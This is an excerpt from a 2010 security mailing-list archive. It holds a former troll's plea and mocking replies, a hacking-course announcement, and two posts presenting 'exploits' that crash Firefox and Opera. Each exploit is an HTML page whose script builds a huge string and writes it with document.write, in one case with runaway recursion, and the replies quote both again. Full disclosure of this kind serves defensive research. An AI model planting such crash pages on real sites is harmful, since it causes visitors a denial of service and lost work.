http://cryptome.org/isp-spy/cricket-spy.pdf *Pactel* – http://cryptome.org/isp-spy/pactel-spy.pdf *GTE* – http://cryptome.org/isp-spy/gte-spy.pdf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Draw a line under this non-sense, seriously
Dear all, I just want to say the recent events are nothing to do with n3td3v whatsoever. I have settled down now with a girl friend and has no interest in doing what I used to do on the list. We all make mistakes and yes I made some. I want to put the past behind me and whoever these kids are who took text from my blog on Monday, modified it and reposted it I just want to ask to be left alone. Folks, I've set my blog to invite-only to try and stop these guys from posting on the list as a counter-measure, and my Twitter feed is only running automatically sent news from ZDNet UK. Honestly, this is an honest message it was nothing to do with me, I was removed from the list on January 2009 and haven't been back since. I just want this nightmare to be over with, I was never a troll, not an intentional one anyway, but there are people (as you've seen since January 2009) wishing to keep it all going and it upsets me, because I am an honest hard working guy who ment no harm to anyone. This whole n3td3v thing that I created back in the day, a line has to be drawn under it because this can't go on anymore. When I post on the list, I was young and naive and thought I was an elite hacker with a hacker group (at the time), I wasn't an intentional troll, whatever trolling is. I just want to be left alone and I want everyone to leave the list alone now. I'm 29 and haven't got the energy anymore to try and email people to say this guy isn't me its just some guy mentioning Yahoo and MI5 to seem like me because they think its funny. I've settled down now, I want to move on with my life but whoever is behind this keeps bringing it back on purpose. I have a girl friend now, who I am settled with, I want to have a baby with her eventually, but all these distractions from the Full-disclosure list are getting in the way. And you may say, just don't read Full-disclosure anymore and you won't know if kids are mimicing you and what not, but I am in the information security industry and Full-disclosure is one of the main mission ciritical lists that people *need* to look at as part of their jobs, its not like we as security professionals have a choice but to read the crap people are posting who are pretending to be n3td3v, an alias I created in my youth nearly 11 years ago now. All I am saying guys, is leave me alone now, kids, adults, security professionals whoever is subscribed, because after all we don't know who is subscribed because the members list of Full-disclosure is private. Please leave these guys alone to do their work as security professionals and leave me alone to raise a family now. I'm serious, please just stop this now. Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [cansecwest] Advanced PHP Hacking
Hi, I'd like to announce a Security Master's Dojo course during next CanSecWest 2010 in Vancouver (March 22-26 2010). Title: Advanced PHP Hacking (!) PHP is a worldwide web language used by individuals as well as companies (Facebook...). This session aims at providing a hands-on focused PHP Hacking experience. After this course, you will really know how attackers work and move through PHP hax0ring so that they can jump deeper down to your networks. *BONUS* This training will end with a final amazing exercise through a step by step live hacking simulation. It will help students at coming back to offensive and defensive hands-on exercises seen during the whole day, thanks to this complete information warfare operation. For further information, just check : http://www.tehtri-security.com/en/trainings.php?t=cansecwest-2010 Register as soon as possible (!) and join us at Cansecwest 2010 (http://cansecwest.com) See you soon in Vancouver :) -- Laurent OUDOT Founder CEO of TEHTRI-Security http://www.tehtri-security.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Draw a line under this non-sense, seriously
On Wed, 03 Mar 2010 00:17:59 GMT, james o' hare said: When I post on the list, I was young and naive and thought I was an elite hacker with a hacker group (at the time), I wasn't an intentional troll, whatever trolling is. Look at the bright side. n3td3v became a meme, but not on the scale of the Star Wars Kid (900 million views. Ouch). You also got lucky and didn't draw the attention of 4chan anon b-tards. pgpgB7mR57g7V.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Draw a line under this non-sense, seriously
Andrew, I'm happy that you've made the choice to settle down and have a family. But wait a second, James O'Hare? Your behaviour of using pretextual identities is suspiciously similar to all those escapades we had. Ah, 69? All about the family, isn't that true, Mr. Wallace? Perhaps you should run for political office. Did you meet this girlfriend on Yahoo chat just this morning? I'm sure she feels very safe and secure having an authority-type figure such as yourself with her. ;-) You had about 12 hours to chart a new life course, and I'm positive you won't be back trolling this list ever again. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit
http://www.exploit-db.com/exploits/11617 === Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit === by Asheesh Kumar Mani Tripathi # code by Asheesh kumar Mani Tripathi # email informationhacke...@gmail.com # company www.aksitservices.co.in # Credit by Asheesh Anaconda #Download www.mozilla.com/firefox #Background Mozilla Firefox is a popular internet browser. .:) #Vulnerability This bug is a typical result when attacker try to write plenitude String in document.write() function .User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. #Impact MOzilla Crash :) #Proof of concept copy the code in text file and save as asheesh.html and closed all tabs and windows to avoid any lost of data open in Mozilla Firefox and wait for 15 sec .. :) and say Good Bye Mozilla ... Per usske phele Mozilla k antim darshan kar le :) Prem se bolo jai maata di Mozilla Rest In Piece!!! asheesh.html html titleasheesh kumar mani tripathi/title /brAsheesh kumar Mani Tripathi head script function asheesh () { var i=24 , anaconda = for(i=24;i 0 ;--i) { anaconda=anaconda+anaconda; } document.write(anaconda); } /script /head body onLoad=asheesh()/body /html BHAGAVAD GITA Quote You came empty handed, you will leave empty handed. What is yours today, belonged to someone else yesterday, and will belong to someone else the day after tomorrow. So, whatever you do, do it as a dedication to God! Tum khaali haath aaye, khaali haath chale. Jo aaj tumhara hain, wao kal kisi aur ka tha, parso kisi aur ka hoga. Tum isse apna samajhkar magna ho rahe ho,bus yahi prasannatha tumhare dukhon ka kaaran hain. #If you have any questions, comments, or concerns, feel free to contact me ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Opera (plenitude String )Denial of Service Exploit
== Opera (plenitude String )Denial of Service Exploit === by Asheesh Kumar Mani Tripathi # code by Asheesh kumar Mani Tripathi # email informationhacke...@gmail.com # company www.aksitservices.co.in # Credit by Asheesh Anaconda #Download http://www.opera.com/download/ #Background Opera is a popular internet browser :) #Vulnerability This bug is a typical result when attacker try to write plenitude String in document.write() function .User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. #Impact Browser doesn't respond any longer to any user input, all tabs are no longer accessible, your work if any might be lost. #Proof of concept copy the code in text file and save as asheesh.html open in Mozilla Firefox asheesh.html html titleasheesh kumar mani tripathi/title Asheesh kumar Mani Tripathi head script function asheesh () { var i , anaconda = for(i=24;i 0 ;--i) { anaconda=anaconda+anaconda; } document.write(anaconda); asheesh(); } asheesh(); /script /head body onLoad=asheesh()/body /html Why do you worry without cause? Whom do you fear without reason? Who can kill you? The soul is neither born, nor does it die. #If you have any questions, comments, or concerns, feel free to contact me. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Going underground, living out of backpack, etc?
If its not, it should be. On Mon, Mar 1, 2010 at 1:05 PM, NOC i...@r00t.ms wrote: On 3/1/10 8:30 AM, valdis.kletni...@vt.edu valdis.kletni...@vt.edu wrote: ... Giardia out in the woods is a horrid way to die a slow death. Giardia, isn't that the new shopping mall restaurant chain? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit
You gotta be joking, this is probably the 3000th DoS advisory for document.write. Guess what sparky, even Jeremy Brown didn't post that one. Thus no surprise exploit-db post this kind of shit. 2010/3/3 information security informationhacke...@gmail.com http://www.exploit-db.com/exploits/11617 === Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit === by Asheesh Kumar Mani Tripathi # code by Asheesh kumar Mani Tripathi # email informationhacke...@gmail.com # company www.aksitservices.co.in # Credit by Asheesh Anaconda #Download www.mozilla.com/firefox #Background Mozilla Firefox is a popular internet browser. .:) #Vulnerability This bug is a typical result when attacker try to write plenitude String in document.write() function .User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. #Impact MOzilla Crash :) #Proof of concept copy the code in text file and save as asheesh.html and closed all tabs and windows to avoid any lost of data open in Mozilla Firefox and wait for 15 sec .. :) and say Good Bye Mozilla ... Per usske phele Mozilla k antim darshan kar le :) Prem se bolo jai maata di Mozilla Rest In Piece!!! asheesh.html html titleasheesh kumar mani tripathi/title /brAsheesh kumar Mani Tripathi head script function asheesh () { var i=24 , anaconda = for(i=24;i 0 ;--i) { anaconda=anaconda+anaconda; } document.write(anaconda); } /script /head body onLoad=asheesh()/body /html BHAGAVAD GITA Quote You came empty handed, you will leave empty handed. What is yours today, belonged to someone else yesterday, and will belong to someone else the day after tomorrow. So, whatever you do, do it as a dedication to God! Tum khaali haath aaye, khaali haath chale. Jo aaj tumhara hain, wao kal kisi aur ka tha, parso kisi aur ka hoga. Tum isse apna samajhkar magna ho rahe ho,bus yahi prasannatha tumhare dukhon ka kaaran hain. #If you have any questions, comments, or concerns, feel free to contact me ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Opera (plenitude String )Denial of Service Exploit
You gotta be joking, this is probably the 3000th DoS advisory for document.write. Guess what sparky, even Jeremy Brown didn't post that one. Thus no surprise exploit-db post this kind of shit. 2010/3/3 information security informationhacke...@gmail.com == Opera (plenitude String )Denial of Service Exploit === by Asheesh Kumar Mani Tripathi # code by Asheesh kumar Mani Tripathi # email informationhacke...@gmail.com # company www.aksitservices.co.in # Credit by Asheesh Anaconda #Download http://www.opera.com/download/ #Background Opera is a popular internet browser :) #Vulnerability This bug is a typical result when attacker try to write plenitude String in document.write() function .User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. #Impact Browser doesn't respond any longer to any user input, all tabs are no longer accessible, your work if any might be lost. #Proof of concept copy the code in text file and save as asheesh.html open in Mozilla Firefox asheesh.html html titleasheesh kumar mani tripathi/title Asheesh kumar Mani Tripathi head script function asheesh () { var i , anaconda = for(i=24;i 0 ;--i) { anaconda=anaconda+anaconda; } document.write(anaconda); asheesh(); } asheesh(); /script /head body onLoad=asheesh()/body /html Why do you worry without cause? Whom do you fear without reason? Who can kill you? The soul is neither born, nor does it die. #If you have any questions, comments, or concerns, feel free to contact me. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/